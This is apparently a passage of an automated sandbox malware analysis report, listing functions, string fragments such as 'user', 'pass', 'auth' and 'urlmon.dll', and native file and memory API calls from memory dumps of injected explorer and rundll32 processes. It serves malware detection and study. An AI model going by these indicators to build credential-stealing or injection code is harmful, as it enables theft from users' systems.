Instruction ID: 70d8f0a2787c765381b591a02acd9572ed3ac21febee318d7ff57dc98e76d4cc
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 59418134219B498FDB65EF6498497EAB7E4FB98345F414B2E984EC7240EF30D505C782

Uniqueness

Uniqueness Score: -1.00%

Function 111DE4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

32.d, xrefs: 111DE4DA
user, xrefs: 111DE4D3
dll, xrefs: 111DE51C
cli., xrefs: 111DE515
sspi, xrefs: 111DE50E

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: e784722bb01592ce53f1c1c78329b99e376f4709576df3c351934a446b9b226c
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: C2417135A19F1D8FCF44EF9880987ADB7E1FB58345F41456AA80ED7200EA71D541CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 111DC432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

h, xrefs: 111DC51F
.dll, xrefs: 111DC53F
kern, xrefs: 111DC52A
el32, xrefs: 111DC537

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 6ef0537867ecfccb04cc8d3b7bad3ea34ba009fd5249621974280c514b650b55
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 0B415F70608B498FDBA9DF68C4883AAFBE1FB98304F504A6F949EC3255DB70D545CB81

Uniqueness

Uniqueness Score: -1.00%

Function 111E30B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

om:, xrefs: 111E3146
Snif, xrefs: 111E3154
f fr, xrefs: 111E313D
, xrefs: 111E3184

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 37ec07adad541cc3e68673a0b17b29454fc1a25e87ad1801a876404fb50089fe
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: FF31DE3151DF886FD71ADBA8C0886EABBD0FB94304F50491EE49BC7251EA31A54ACA43

Uniqueness

Uniqueness Score: -1.00%

Function 111E30C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

om:, xrefs: 111E3146
Snif, xrefs: 111E3154
f fr, xrefs: 111E313D
, xrefs: 111E3184

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 6c29236269e8148d1b94f87f950c7eb26c28e69762f1650fee9362d0a5ef566f
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 4E31DE7151DF486FD71ADBA8C489AEAB7D4FB94304F40491EE49BC3251EA30E54ACA82

Uniqueness

Uniqueness Score: -1.00%

Function 111DEFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

chro, xrefs: 111DF023
.dll, xrefs: 111DEFFE
hild, xrefs: 111DEFF6
me_c, xrefs: 111DEFEE

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: a0d64d7fa7066b3317822d5e6f095fd6f4c359c3ece44980624a3337182e733c
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: C5317C74119F0A4FCB85EF688499BAAB7E1FB98308F84062DA84ACB254DF30D5458B52

Uniqueness

Uniqueness Score: -1.00%

Function 111DEFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

chro, xrefs: 111DF023
.dll, xrefs: 111DEFFE
hild, xrefs: 111DEFF6
me_c, xrefs: 111DEFEE

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: f0dbfda6d73e24dccecec0c7c9cbed7645c2ccf91dd55a9a16b09ee20108432f
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 7A318D75119F0A8FCB85DF688498BAAF7E1FF98308F84462D984ACB254DF30D545CB52

Uniqueness

Uniqueness Score: -1.00%

Function 111E18C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

on.d, xrefs: 111E1902
urlmon.dll, xrefs: 111E1959
User-Agent: , xrefs: 111E1935, 111E1948
nt: , xrefs: 111E191E

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 2ddc424b5c49c0be6ca5ac11f036548841cde7aca3b7f5003620891ee783594a
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 8831B131615A4D8FCB46EFA8C8887EDBBE1FB58218F40422AD85ED7240EE749645C789

Uniqueness

Uniqueness Score: -1.00%

Function 111E18BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

on.d, xrefs: 111E1902
urlmon.dll, xrefs: 111E1959
User-Agent: , xrefs: 111E1935, 111E1948
nt: , xrefs: 111E191E

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 796ddfd6bc8bec6aef0a61188229213e78d8adb8b521ddfa1a2bb3e65a308100
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: EF219371615E4D8ECB06EFE8C8887EDBBE1FF58208F40421AD45AD7240EE749645CB89

Uniqueness

Uniqueness Score: -1.00%

Function 111E2E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

t, xrefs: 111E2EF4
l, xrefs: 111E2F03
l, xrefs: 111E2F26
., xrefs: 111E2F1F

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: d4d7e870cb54c15aa70e4190a7cc83090921c43b026fd722092f547a08fe78a3
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: A4214874A25E0E9FDB08EFA8D0487EDFAF1FB58308F50462ED409E3640DB75A5918B84

Uniqueness

Uniqueness Score: -1.00%

Function 111E2E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

t, xrefs: 111E2EF4
l, xrefs: 111E2F03
l, xrefs: 111E2F26
., xrefs: 111E2F1F

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 705ade0060a5868422aae418ef3e6cafceab8f8ca8a7a02ccc3529a4b576f9b4
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: CF216B74A25E0E9FDB04EFA8C0487EDFAF1FB58308F50462ED409D3600DB75A5918B84

Uniqueness

Uniqueness Score: -1.00%

Function 111E2FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

user, xrefs: 111E3015
pass, xrefs: 111E3022
logi, xrefs: 111E303C
auth, xrefs: 111E302F

Memory Dump Source

Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11160000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 854d7313cb7028db504c37a2bc7f7ae7c9f5c1714749d4bf6058bc1d2e719af2
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 8E21C330618B0E4BCB06CF9D98846DEBBE1EF88348F015619D80ADB244D7B0E914CBC2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 4312, Parent PID: 4056COMMON

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	1.9%
Signature Coverage:	0%
Total number of Nodes:	635
Total number of Limit Nodes:	79

Executed Functions

Function 0013A3A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00134BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00134BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0013A39D
NtReadFile.NTDLL(00134D62,5EB65239,FFFFFFFF,00134A21,?,?,00134D62,?,00134A21,FFFFFFFF,5EB65239,00134D62,?,00000000), ref: 0013A445

Strings

.z`, xrefs: 0013A38D, 0013A398

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: File$CreateRead
String ID: .z`
API String ID: 3388366904-1441809116
Opcode ID: 8cb8f15fdbed3fefa713bd5509b9d167f7fed7149baae946b1e0fd33c36ebeaf
Instruction ID: c8af267a638d184f82f37cb7df09c4a943b1e35ca3a8aea1b8c7e4372435c178
Opcode Fuzzy Hash: 8cb8f15fdbed3fefa713bd5509b9d167f7fed7149baae946b1e0fd33c36ebeaf
Instruction Fuzzy Hash: 9F21CFB6204149AFCB18DF98DC80DEB77E9AF8C358B158249FA5DD3241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0013A34B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00134BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00134BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0013A39D

Strings

.z`, xrefs: 0013A38D, 0013A398

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 692797b44b9505386ecdb8a2d5cfb10ff4a7ca1476b4a43bad4bc2871eff0a65
Instruction ID: 03293498c754fbcae833536d0dca6a796c61fc4278de9a7eda336278710590e4
Opcode Fuzzy Hash: 692797b44b9505386ecdb8a2d5cfb10ff4a7ca1476b4a43bad4bc2871eff0a65
Instruction Fuzzy Hash: 5E01ABB2201208AFCB08CF88DC84EEB77A9BF8C754F158258BA5D97241C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0013A350 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00134BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00134BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0013A39D

Strings

.z`, xrefs: 0013A38D, 0013A398

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 2be8029a3b5f3ed0bc22ddaa67e3f2985ddf1c0757f8e46ec2a34d2ece00c968
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 3AF0BDB2200208AFCB08CF88DC85EEB77ADAF8C754F158248BA1D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0013A3FA Relevance: 1.6, APIs: 1, Instructions: 54filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00134D62,5EB65239,FFFFFFFF,00134A21,?,?,00134D62,?,00134A21,FFFFFFFF,5EB65239,00134D62,?,00000000), ref: 0013A445

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 20681f25b8ee27dd03be570ce50c174d0d765f6a9198375b12f41645dd841790
Instruction ID: 7c7180de3c7150f7103d7f35cad5e36a4b217795d9cb315aa4016c97403b6ef6
Opcode Fuzzy Hash: 20681f25b8ee27dd03be570ce50c174d0d765f6a9198375b12f41645dd841790
Instruction Fuzzy Hash: CE012DB2200104AFDB14DF98CC85EEB77ADEF8C324F058658FA6D97281C630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0013A400 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00134D62,5EB65239,FFFFFFFF,00134A21,?,?,00134D62,?,00134A21,FFFFFFFF,5EB65239,00134D62,?,00000000), ref: 0013A445

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: c6171e2780a746eaa842610996bbfc4cb1fcaceed2dc81ea591a75ee7b9e5b0f
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: B0F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158248BE5D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0013A52A Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00122D11,00002000,00003000,00000004), ref: 0013A569

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b0c503cb71f4790e150217c0e42f88ac549b4aef5a4aeda69672c8f75e18314f
Instruction ID: fc411d860c6f0719a0476205178cc90fe45a62f5a1d87b09a798da0022fb96c5
Opcode Fuzzy Hash: b0c503cb71f4790e150217c0e42f88ac549b4aef5a4aeda69672c8f75e18314f
Instruction Fuzzy Hash: ECF01CB5214109AFDB14EF89DC91EEB77ADAF88354F158649FE5D97242C630E810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0013A530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00122D11,00002000,00003000,00000004), ref: 0013A569

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 21bc104824c91c4366fc256c28a5f513fde254a676fe6d8902b5921d7770c6b0
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 51F015B2200208AFCB14DF89CC81EAB77ADAF88754F118148BE5C97241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0013A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00134D40,?,?,00134D40,00000000,FFFFFFFF), ref: 0013A4A5

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: e7d0088879c293455daf381112d57c62f540d3e18d0865eb092e9c94ee0df164
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 4FD01776200214ABD710EB98CC85EAB7BACEF48760F154499BA5C9B242C630FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 0013A47F Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00134D40,?,?,00134D40,00000000,FFFFFFFF), ref: 0013A4A5

Memory Dump Source

Source File: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120000_rundll32.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: da806dc257014d85078951ff3cbf3225d5c70f21203b21ca54aaf9ec73ede489
Instruction ID: 6a957593bc0b2617df91a968cc03af3037daa90a4aab1a2fefa28a1df66689f4
Opcode Fuzzy Hash: da806dc257014d85078951ff3cbf3225d5c70f21203b21ca54aaf9ec73ede489
Instruction Fuzzy Hash: 23D0A7AD40D2C04FCB11EBB465D10D77F80EE512187245ECEE4EC47607D278D2199391

Uniqueness

Uniqueness Score: -1.00%

Function 04432C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04432C6A

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 81e5de220031ef8b0c987429e71c9ac0ecaa9eba072f4f56a5f5aa1ae9c1e3ac
Instruction ID: cd7c76a578f24e8281ccf1eb5c6252a6e9a2362a7e3745030ba21729c7c5edce
Opcode Fuzzy Hash: 81e5de220031ef8b0c987429e71c9ac0ecaa9eba072f4f56a5f5aa1ae9c1e3ac
Instruction Fuzzy Hash: E490023520140842F50071584404B4600058BF0305F55C017A0126658D8759D9517521

Uniqueness

Uniqueness Score: -1.00%

Function 04432C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04432C7A

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9bdf33cb2795bf14df5e49ab79e0dd68dee425011808f64598c8e3e436de04e6
Instruction ID: 54b3c257ec06e448bf22b56684d6e1b42f6df48280477777d3b86288951be586
Opcode Fuzzy Hash: 9bdf33cb2795bf14df5e49ab79e0dd68dee425011808f64598c8e3e436de04e6
Instruction Fuzzy Hash: 3490023520148802F5107158840474A00058BE0305F59C412A442665CD87D9D9917121

Uniqueness

Uniqueness Score: -1.00%

Function 04432CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04432CAA

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c02c1f90852a9e1e1c44f7197f3411d3188a80fc729bc8bd66ac44b284cecdba
Instruction ID: d1cc67f7c7571971746ff2ec57ed6eb9353e8785aa687a14570552f594c90190
Opcode Fuzzy Hash: c02c1f90852a9e1e1c44f7197f3411d3188a80fc729bc8bd66ac44b284cecdba
Instruction Fuzzy Hash: DB90023520140402F5007598540864600058BF0305F55D012A5026559EC7A9D9916131

Uniqueness

Uniqueness Score: -1.00%

Function 04432D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04432D1A

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e36702207afc087a8ba1d1772650b2263acdc3ae11bfb32947241f036ab17257
Instruction ID: 91dd9a1f06a0434dc9341a83411e37e884930469c57cabae1ee72dfe74706179
Opcode Fuzzy Hash: e36702207afc087a8ba1d1772650b2263acdc3ae11bfb32947241f036ab17257
Instruction Fuzzy Hash: 7190022D21340002F5807158540860A00058BE1206F95D416A001755CCCA59D9695321

Uniqueness

Uniqueness Score: -1.00%

Function 04432DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04432DDA

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 08ebc100d5c398e79482a9d56a44feb6a11afe38c01eecd574776a7c0b99d549
Instruction ID: 5dfd344c19f6990280b809c2849a7e9a732aae6eaf5760b15fd393f0afb39f87
Opcode Fuzzy Hash: 08ebc100d5c398e79482a9d56a44feb6a11afe38c01eecd574776a7c0b99d549
Instruction Fuzzy Hash: 01900225242441527945B158440450740069BF0245795C013A1416954C866AE956D621

Uniqueness

Uniqueness Score: -1.00%

Function 04432DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04432DFA

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e49f9ce71363209998fca880ec814bd6972a9de67d21cadaf22030c47bd7b3bf
Instruction ID: 8e835938f9dc387ea649d441e6abcc95a33fb47b631adac547fc0038103c9b84
Opcode Fuzzy Hash: e49f9ce71363209998fca880ec814bd6972a9de67d21cadaf22030c47bd7b3bf
Instruction Fuzzy Hash: 4B90023520140413F5117158450470700098BE0245F95C413A042655CD979ADA52A121

Uniqueness

Uniqueness Score: -1.00%

Function 04432EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04432EAA

Memory Dump Source

Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true

Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
